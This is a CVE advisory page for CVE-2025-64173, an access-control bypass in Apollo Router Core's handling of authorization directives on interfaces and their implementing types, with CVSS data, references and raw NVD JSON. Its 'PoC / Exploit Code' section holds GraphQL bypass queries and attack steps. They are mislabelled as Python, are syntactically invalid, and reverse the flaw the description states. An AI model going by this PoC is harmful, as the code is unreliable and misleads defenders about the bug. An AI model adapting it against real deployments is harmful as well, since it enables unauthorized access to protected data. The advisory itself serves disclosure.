CVE-2025-64173

Description

Apollo Router Core is a configurable graph router written in Rust to run a federated supergraph using Apollo Federation 2. In versions 1.61.11 below, as well as 2.0.0-alpha.0 through 2.8.1-rc.0, a vulnerability allowed for unauthenticated queries to access data that required additional access controls. Router incorrectly handled access control directives on interface types/fields and their implementing object types/fields, applying them to interface types/fields while ignoring directives on their implementing object types/fields when all implementations had the same requirements. Apollo Router customers defining @authenticated, @requiresScopes, or @policy directives inconsistently on polymorphic types (i.e., object types that implement interface types) are impacted. This issue is fixed in versions 1.61.12 and 2.8.1.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Apollo Router Core < 1.61.12

Apollo Router Core 2.0.0-alpha.0 - 2.8.1-rc.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-64173 PoC - Apollo Router访问控制绕过
# 攻击者通过直接查询实现对象绕过接口访问控制

query exploitBypass {
  # 假设InterfaceType有@requiresScopes directive
  # 但ImplementationObject未正确继承检查
  implementationObjects {
    id
    sensitiveField  # 本应需要认证但可被未授权访问
    confidentialData
  }
}

# 正常通过接口查询会被访问控制阻止
query normalQuery (需要认证) {
  interfaceTypes {
    id
    sensitiveField
  }
}

# 攻击步骤：
# 1. 识别实现对象类型名称
# 2. 直接构造针对实现对象的查询
# 3. 绕过接口级别的@authenticated/@requiresScopes/@policy限制

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64173
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64173
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64173/
[4] VulDB https://vuldb.com/cve/CVE-2025-64173
[5] https://github.com/apollographql/router/releases/tag/v2.8.1
[6] https://github.com/apollographql/router/security/advisories/GHSA-x33c-7c2v-mrj9
[7] https://www.apollographql.com/docs/graphos/routing/security/authorization#authorization-directives

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64173", "sourceIdentifier": "[email protected]", "published": "2025-11-06T21:15:43.660", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Apollo Router Core is a configurable graph router written in Rust to run a federated supergraph using Apollo Federation 2. In versions 1.61.11 below, as well as 2.0.0-alpha.0 through 2.8.1-rc.0, a vulnerability allowed for unauthenticated queries to access data that required additional access controls. Router incorrectly handled access control directives on interface types/fields and their implementing object types/fields, applying them to interface types/fields while ignoring directives on their implementing object types/fields when all implementations had the same requirements. Apollo Router customers defining @authenticated, @requiresScopes, or @policy directives inconsistently on polymorphic types (i.e., object types that implement interface types) are impacted. This issue is fixed in versions 1.61.12 and 2.8.1."}, {"lang": "es", "value": "Apollo Router Core es un router de grafos configurable escrito en Rust para ejecutar un supergrafo federado usando Apollo Federation 2. En versiones anteriores a la 1.61.11, así como de la 2.0.0-alpha.0 a la 2.8.1-rc.0, una vulnerabilidad permitía que consultas no autenticadas accedieran a datos que requerían controles de acceso adicionales. El router manejaba incorrectamente las directivas de control de acceso en tipos/campos de interfaz y sus tipos/campos de objeto implementadores, aplicándolas a los tipos/campos de interfaz mientras ignoraba las directivas en sus tipos/campos de objeto implementadores cuando todas las implementaciones tenían los mismos requisitos. Los clientes de Apollo Router que definen directivas @authenticated, @requiresScopes o @policy de manera inconsistente en tipos polimórficos (es decir, tipos de objeto que implementan tipos de interfaz) se ven afectados. Este problema está solucionado en las versiones 1.61.12 y 2.8.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://github.com/apollographql/router/releases/tag/v2.8.1", "source": "[email protected]"}, {"url": "https://github.com/apollographql/router/security/advisories/GHSA-x33c-7c2v-mrj9", "source": "[email protected]"}, {"url": "https://www.apollographql.com/docs/graphos/routing/security/authorization#authorization-directives", "source": "[email protected]"}]}}